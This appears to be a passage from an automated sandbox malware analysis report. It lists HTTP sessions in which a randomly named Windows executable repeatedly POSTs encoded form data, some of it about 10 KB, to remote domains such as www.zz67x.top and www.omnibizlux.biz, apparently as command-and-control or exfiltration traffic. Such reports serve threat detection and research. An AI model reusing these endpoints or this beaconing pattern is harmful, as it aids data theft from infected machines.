                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 42 66 64 43 52 79 48 3d 44 52 70 38 71 56 58 75 33 44 74 74 58 77 53 38 59 4b 68 77 64 31 66 4d 71 6b 6e 46 53 76 68 6f 67 57 78 53 76 66 5a 34 64 2f 69 72 2f 34 47 4a 4f 31 6b 42 50 47 4b 6a 72 66 4f 48 2b 49 39 48 54 42 62 77 4d 78 49 71 36 4f 5a 6d 41 2b 74 30 55 38 63 70 6a 55 48 76 57 63 55 6e 74 53 58 6a 34 58 47 6e 71 52 37 49 64 31 4b 42 78 46 2b 41 70 6c 4e 6e 33 4c 67 3d 26 5a 70 45 48 39 3d 54 6a 53 50 35 4c 58 58 62 4e 38 64 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.45002438.47.232.194804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:09.993041039 CET585OUTPOST /45n6/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Origin: http://www.zz67x.top
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.zz67x.top/45n6/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 51 68 37 42 79 57 48 32 37 45 61 37 55 6c 52 68 53 2f 4b 45 61 39 6d 56 49 7a 52 70 36 66 62 35 78 34 51 36 4d 63 58 35 71 34 67 58 36 78 43 32 54 30 48 74 5a 56 71 30 61 68 2f 59 4d 61 6c 79 39 34 64 4b 65 34 45 2b 70 2f 4c 72 52 41 4c 72 4e 79 51 4c 73 31 42 41 72 41 34 59 7a 6c 33 59 65 48 4f 69 49 45 48 34 71 78 65 51 4d 38 4b 5a 61 76 66 50 75 61 6a 34 53 52 39 73 58 72 74 62 54 57 62 56 64 78 2f 65 4c 68 69 71 69 78 43 42 47 62 33 52 33 37 69 61 76 58 34 76 71 52 44 4c 63 49 7a 7a 50 55 67 46 6e 6f 33 68 75 69 4a 59 58 6c 59 58 6d 33 4d 45 43 70 47 4f 71 45 37 6e 70 67 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=Qh7ByWH27Ea7UlRhS/KEa9mVIzRp6fb5x4Q6McX5q4gX6xC2T0HtZVq0ah/YMaly94dKe4E+p/LrRALrNyQLs1BArA4Yzl3YeHOiIEH4qxeQM8KZavfPuaj4SR9sXrtbTWbVdx/eLhiqixCBGb3R37iavX4vqRDLcIzzPUgFno3huiJYXlYXm3MECpGOqE7npg==
                                                                                                                                  Nov 7, 2024 12:54:10.896868944 CET289INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.45002538.47.232.194804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:12.552975893 CET605OUTPOST /45n6/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Origin: http://www.zz67x.top
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.zz67x.top/45n6/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4d 4d 58 2f 6a 61 32 56 41 72 74 65 56 71 30 44 52 2f 5a 49 61 6c 35 39 34 68 43 65 36 51 2b 70 2f 50 72 52 41 62 72 4e 46 4d 49 74 6c 42 65 77 51 34 61 72 46 33 59 65 48 4f 69 49 45 69 76 71 78 47 51 4d 4d 36 5a 61 4f 66 4d 77 4b 6a 35 61 78 39 73 54 72 74 66 54 57 62 6e 64 77 69 37 4c 6c 53 71 69 77 79 42 48 4b 33 57 35 37 69 41 72 58 35 62 36 7a 71 47 47 35 47 6f 4f 46 67 46 6b 5a 7a 32 6d 45 45 43 47 55 35 41 30 33 6f 33 66 75 50 36 6e 48 47 75 79 76 2f 38 49 37 34 5a 4b 59 57 4a 35 48 35 6d 44 73 33 6a 69 68 38 3d
                                                                                                                                  Data Ascii: NBfdCRyH=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktMMX/ja2VArteVq0DR/ZIal594hCe6Q+p/PrRAbrNFMItlBewQ4arF3YeHOiIEivqxGQMM6ZaOfMwKj5ax9sTrtfTWbndwi7LlSqiwyBHK3W57iArX5b6zqGG5GoOFgFkZz2mEECGU5A03o3fuP6nHGuyv/8I74ZKYWJ5H5mDs3jih8=
                                                                                                                                  Nov 7, 2024 12:54:13.487097025 CET289INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:13 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.45002638.47.232.194804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:15.101788044 CET10687OUTPOST /45n6/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Origin: http://www.zz67x.top
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.zz67x.top/45n6/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4e 59 58 2f 77 53 32 54 58 2f 74 66 56 71 30 4c 78 2f 45 49 61 6c 6f 39 34 35 47 65 36 4d 41 70 39 48 72 44 7a 6a 72 4c 77 34 49 6e 6c 42 65 35 77 34 5a 7a 6c 33 33 65 47 69 75 49 45 79 76 71 78 47 51 4d 50 69 5a 54 2f 66 4d 33 36 6a 34 53 52 38 6a 58 72 74 37 54 53 33 33 64 77 58 4f 49 57 61 71 69 51 69 42 42 38 72 57 78 37 69 47 73 58 35 44 36 7a 33 47 47 35 61 6b 4f 46 56 69 6b 5a 48 32 69 69 70 35 61 77 70 35 67 48 31 76 45 4f 44 35 6a 6d 53 35 71 6f 6e 31 4e 59 63 6b 5a 5a 79 34 32 46 31 71 48 76 36 68 77 42 56 4b 6d 6b 44 6d 6d 2b 6d 6e 31 66 42 53 31 64 6f 4e 41 57 63 39 4c 57 4d 42 38 6a 73 63 4c 69 76 42 75 35 65 41 52 74 42 64 4e 33 75 4c 37 61 71 39 4e 39 6a 44 4b 64 48 35 58 38 79 52 65 7a 6a 45 47 30 30 36 61 62 54 65 61 58 34 43 78 4e 7a 78 65 55 42 55 52 74 6b 41 58 45 67 51 4a 47 33 65 77 56 31 37 42 69 36 42 7a 78 4b 6a 71 71 4d 72 6b [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktNYX/wS2TX/tfVq0Lx/EIalo945Ge6MAp9HrDzjrLw4InlBe5w4Zzl33eGiuIEyvqxGQMPiZT/fM36j4SR8jXrt7TS33dwXOIWaqiQiBB8rWx7iGsX5D6z3GG5akOFVikZH2iip5awp5gH1vEOD5jmS5qon1NYckZZy42F1qHv6hwBVKmkDmm+mn1fBS1doNAWc9LWMB8jscLivBu5eARtBdN3uL7aq9N9jDKdH5X8yRezjEG006abTeaX4CxNzxeUBURtkAXEgQJG3ewV17Bi6BzxKjqqMrkBeyn5ypY8PO6y4xNwUEhI/UdeMobhTXK2bGWanT24TgS/X7J9oUx3hi4yyJXlP44f9Xzjt8I0G3LJcU07KwbwAZX7tQjNHDlfneuqaiAxakaTyRvKWgajmFi6HBrCfaaw9l9flRp3rgv512Fw7LjqaTk96/s/OiJZAsxMsyHziDvwVXDuH/qBnfFav99z4W0gvSluKfAAPmXv54gFxIA2Xw7QfoCIaBt7rx8MNoCt+JIaSS+ypf7YtVT+vF3F+GLvAMIS9Q0D6nDUcNkiLZ6LHnTl/WvFj+HFtVtKd4yGuNwaH8z+e2cciI0fGcDtvRXo8fLfsX0CBYDyGdYRpZXPB6U70/LABas+HWdEq9ntW1TzcIIQA5LTgG2bbDt4OWB+6z2o1IMXW7eAUSiODLNixFGldY3Gew7JOrXfQj+XvSMiDUy1UUCanHqNeTQpyNS6bI8Vp4DOqOLl5dOltVGHAFFx8yULbwRpu0YfaWpY5Mw7T0iyDqZNvvIHOSzL94WYjWwVa8HUn/Judkbd2amNGxUDSl0cqTSEqKI/PXu7IQ4+7Fc+ZEiXZ6wA2S/n63FCoLTjZ5LeloNqkHiWgqKlnOTaI2rJYL4GP/3PAW7u/T3vS18gIZtqO2hOCrPOULUf86vjMuG+XA4+ttWTZOreALEU6s6njE2VG [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:54:16.066637993 CET289INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:15 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  20192.168.2.45002738.47.232.194804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:17.642848015 CET331OUTGET /45n6/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=djThxhCXsVTaW29XXtOrXv7xIwJyr9fT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYygTJ2xilMgHX7dTLMRFf+/COIbLTgBfvWu/E= HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.zz67x.top
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:54:18.611845016 CET289INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:18 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  21192.168.2.450028167.172.133.32804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:23.836679935 CET600OUTPOST /jlqg/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Origin: http://www.omnibizlux.biz
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.omnibizlux.biz/jlqg/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 62 59 4f 45 44 33 58 75 76 49 77 65 38 41 5a 66 47 66 6f 6e 68 5a 63 43 34 6b 34 54 39 73 4a 33 34 56 45 67 41 56 51 2f 58 71 79 64 63 56 6a 6f 4b 52 67 45 72 46 70 31 2f 53 68 62 37 68 4a 50 4a 54 42 68 68 2b 2f 56 41 63 6d 71 31 46 43 6c 62 4e 77 74 36 2b 56 70 47 48 56 57 76 7a 72 53 59 45 37 4e 44 6f 43 6e 43 77 37 73 77 70 5a 63 68 70 45 6b 7a 77 61 67 77 7a 4c 43 56 6b 70 49 72 61 4d 36 31 79 2f 74 31 5a 39 48 67 78 6b 6f 42 73 4b 2f 75 66 57 74 37 76 51 34 47 2b 68 71 66 49 64 6a 2f 52 6a 62 33 57 56 30 51 4a 68 41 6f 46 61 70 48 61 38 48 54 2f 6f 53 73 74 6b 55 67 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=xbYOED3XuvIwe8AZfGfonhZcC4k4T9sJ34VEgAVQ/XqydcVjoKRgErFp1/Shb7hJPJTBhh+/VAcmq1FClbNwt6+VpGHVWvzrSYE7NDoCnCw7swpZchpEkzwagwzLCVkpIraM61y/t1Z9HgxkoBsK/ufWt7vQ4G+hqfIdj/Rjb3WV0QJhAoFapHa8HT/oSstkUg==
                                                                                                                                  Nov 7, 2024 12:54:24.490442991 CET306INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:24 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  22192.168.2.450029167.172.133.32804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:26.385613918 CET620OUTPOST /jlqg/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Origin: http://www.omnibizlux.biz
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.omnibizlux.biz/jlqg/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 4f 79 63 39 6c 6a 70 4f 6c 67 48 72 46 70 39 66 53 6b 55 62 68 34 50 49 76 4a 68 68 53 2f 56 45 4d 6d 71 31 56 43 6b 70 6c 33 69 4b 2b 74 69 6d 48 62 53 76 7a 72 53 59 45 37 4e 41 55 73 6e 43 34 37 73 67 5a 5a 64 44 42 44 71 54 77 5a 74 67 7a 4c 47 56 6c 75 49 72 62 62 36 30 75 47 74 32 68 39 48 6b 31 6b 6f 51 73 4c 6b 65 66 55 77 72 75 56 77 31 66 59 67 76 52 6d 72 35 5a 6a 57 33 4b 54 34 32 45 37 52 5a 6b 4e 37 48 2b 50 61 55 32 63 66 76 51 74 50 6e 61 4c 65 2f 76 32 57 6d 72 78 36 58 4e 62 50 62 55 4b 51 56 41 3d
                                                                                                                                  Data Ascii: NBfdCRyH=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FOyc9ljpOlgHrFp9fSkUbh4PIvJhhS/VEMmq1VCkpl3iK+timHbSvzrSYE7NAUsnC47sgZZdDBDqTwZtgzLGVluIrbb60uGt2h9Hk1koQsLkefUwruVw1fYgvRmr5ZjW3KT42E7RZkN7H+PaU2cfvQtPnaLe/v2Wmrx6XNbPbUKQVA=
                                                                                                                                  Nov 7, 2024 12:54:27.045749903 CET306INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:26 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  23192.168.2.450030167.172.133.32804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:54:29.017657042 CET10702OUTPOST /jlqg/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.omnibizlux.biz
                                                                                                                                  Origin: http://www.omnibizlux.biz
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.omnibizlux.biz/jlqg/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 47 79 64 4c 35 6a 72 70 35 67 47 72 46 70 7a 2f 53 6c 55 62 68 6c 50 49 33 7a 68 68 76 49 56 47 45 6d 73 6d 4e 43 30 4e 78 33 35 61 2b 74 74 47 48 57 57 76 7a 69 53 63 59 6e 4e 44 73 73 6e 43 34 37 73 6a 52 5a 4c 68 70 44 6f 54 77 61 67 77 7a 58 43 56 6b 4a 49 72 53 75 36 30 61 57 74 48 42 39 48 45 6c 6b 75 6d 34 4c 35 75 66 61 7a 72 75 7a 77 31 54 35 67 76 4d 64 72 35 45 45 57 31 57 54 34 79 4e 77 4e 4e 55 37 69 45 65 4f 4d 6d 58 38 61 74 49 44 4d 32 4c 79 5a 61 37 33 56 31 76 62 68 6c 39 66 62 36 45 73 4c 41 55 7a 38 4a 30 39 65 41 34 74 57 62 31 5a 43 6f 2b 38 4a 44 4c 79 41 33 4c 71 57 49 4f 76 47 59 41 62 2f 72 6b 35 72 4c 5a 53 63 33 57 59 6e 32 39 7a 4c 73 75 63 56 49 4c 46 4b 72 6e 65 7a 6d 6d 55 4a 42 47 63 6c 43 48 50 65 6e 53 6b 56 44 77 64 50 6d 34 69 56 6f 78 4a 73 67 51 62 4e 6c 37 34 6e 34 46 56 31 44 68 64 6f 41 67 6f 57 42 42 56 6b [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FGydL5jrp5gGrFpz/SlUbhlPI3zhhvIVGEmsmNC0Nx35a+ttGHWWvziScYnNDssnC47sjRZLhpDoTwagwzXCVkJIrSu60aWtHB9HElkum4L5ufazruzw1T5gvMdr5EEW1WT4yNwNNU7iEeOMmX8atIDM2LyZa73V1vbhl9fb6EsLAUz8J09eA4tWb1ZCo+8JDLyA3LqWIOvGYAb/rk5rLZSc3WYn29zLsucVILFKrnezmmUJBGclCHPenSkVDwdPm4iVoxJsgQbNl74n4FV1DhdoAgoWBBVk8v6zj7uQVo81w6RQcrO2hAniERC2ycOMmIfCliC+3h2ICtJxHq2DHFPzPN2unTKWNB9wCGVrKnRHEDQ9j6mlrRljJxum5jA6kG/6PEvkl6rmQpk81T+lwIKRTmdT8c8cLz5kcQB/Sm/zJW/wiRfwGdr43uwqqFLzNLkFBU58s+Lz3r/UhnXQ8JI/8tNc8TQvRoOETGmcLw/98V4RDPRFM8MOqkO6F1I6uaqHrlBgNwDDMenJLXPscqlZNhSCovrqTBPB0au/OXvqskL0ns7+VI+jsM9inIa8wbo44tNmlja3Z1rvZHQqW2wa8+ijS5rOWsbgGM/VFep/i8hP7nucyOK5PuV8WasfE7XnQeYOA9pQkEc7J9i4gWrl+daW/LDHQZEX7IxP+wSbhRTaQw9pYk2pDttMcWoS3EuU2TAlom3jhGoNcXx6GeJqPKUQZgIFof1TxQjGERBkJIM5e6tJP9Q9ZxTTJ/ZBk5S1B1dsy/GGx9CYb0g+NcW+cTreXufwMVTnGNuawZ3jKb6z5Ygn/ZElFxLM0ZSoY8VpSroVpX1j0EXQTjD79xvQVdW7Pm0+c4hWmIXsvk/f482McWYTjOxTrwfkuKHIcASQOcRcPRMOrjZJdIOP3IC0MRSRlgWWGmREWZqRG6ou0K+yFw6+ur2cgVOeqr9YuU [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:54:29.615838051 CET306INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.26.1
                                                                                                                                  Date: Thu, 07 Nov 2024 11:54:29 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
